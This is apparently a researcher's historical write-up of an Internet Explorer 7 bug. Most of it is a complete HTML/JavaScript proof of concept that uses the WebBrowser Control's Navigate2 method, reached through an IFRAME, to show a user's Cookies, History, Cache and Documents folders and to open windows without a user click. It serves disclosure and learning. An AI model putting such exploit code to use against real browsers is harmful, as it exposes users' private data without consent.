Navigating PIDL Using WebBrowser Control as IFRAME

Because IFRAMEs expose the WebBrowser Control’s Navigate2 method, a web page can use Navigate2 with a PIDL (shell folder identifier) to open special shell folders — like the user’s Documents, Control Panel, Cookies, or Desktop — directly inside the IFRAME, or even in a new window using a frame target. This also allows opening a new browser window in a way that has nothing to do with a user click.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Navigating_PIDL_Using_WBControlAsIframe</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>Navigating_PIDL_Using_WBControlAsIframe</h2>
</center>
<ul>
	<li><span onclick="openNewWindow();">[IE7] Open New Window</span> with this same location (Like pressing Control N).<br/>
	<font size="1">(It uses a <b>setTimeout</b> so you can see that <u>the <b>click event</b> has nothing to do with the opened Window</u>. It doesn't matter if the user clicks.)</font><br /><br />
	</li>
	<li>Current User --> <b>Programs Folder</b> <span onclick="navPIDL(2, false);">inside the IFRAME</span> or <span onclick="navPIDL(2, true);">[IE7] in a new Window</span>.</li>
	<li>Current User --> <b>Control Panel</b> <span onclick="navPIDL(3, false);">inside the IFRAME</span> or <span onclick="navPIDL(3, true);">[IE7] in a new Window</span>.</li>
	<li>Current User --> <b>My Documents</b> <span onclick="navPIDL(5, false);">inside the IFRAME</span> or <span onclick="navPIDL(5, true);">[IE7] in a new Window</span>.</li>
	<li>Current User --> <b>Cache</b> <span onclick="navPIDL(32, false);">inside the IFRAME</span> or <span onclick="navPIDL(32, true);">[IE7] in a new Window</span>.</li>
	<li>Current User --> <b>Cookies</b> <span onclick="navPIDL(33, false);">inside the IFRAME</span> or <span onclick="navPIDL(33, true);">[IE7] in a new Window</span>.</li>
	<li>Current User --> <b>History</b> <span onclick="navPIDL(34, false);">inside the IFRAME</span> or <span onclick="navPIDL(34, true);">[IE7] in a new Window</span>.</li>
	<li>Current User --> <b>DeskTop</b> <span onclick="navPIDL(0, false);">inside the IFRAME</span> or <span onclick="navPIDL(0, true);">[IE7] in a new Window</span>.</li>
</ul>
<br/>
<iframe id="iframeAsWBControl" name="wbControlName" src="about:blank" width="500" height="300"></iframe>
</font>
<script language="JavaScript">
var wbControl = document.getElementById('iframeAsWBControl');
var PIDL = 0;
function openNewWindow()
{
	wbControlName.location.replace("about:blank");
	setTimeout('wbControl.Navigate2(1, 1, "newWindow");',2000);
}
function navPIDL(_PIDL, _newWindow)
{
	PIDL = _PIDL;
	wbControlName.location.replace("about:blank");
	if (_newWindow)
	{
		setTimeout('wbControl.Navigate2(PIDL,1,"targetFrame");',500);
		setTimeout('wbControl.Navigate2(PIDL,1,"targetFrame");',1000);
	}
	else 
	{
		setTimeout('wbControl.Navigate2(PIDL,0);',500);
	}
}
</script>

</body>
</html>

Navigate2 accepts integer PIDLs for well-known shell folders. Passing 5 navigates to My Documents, 32 to the IE cache, 33 to cookies, 34 to browser history. A web page being able to display the user’s browsing history or cookie folder inside an IFRAME — even without reading its contents directly — is a significant information disclosure risk through UI observation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.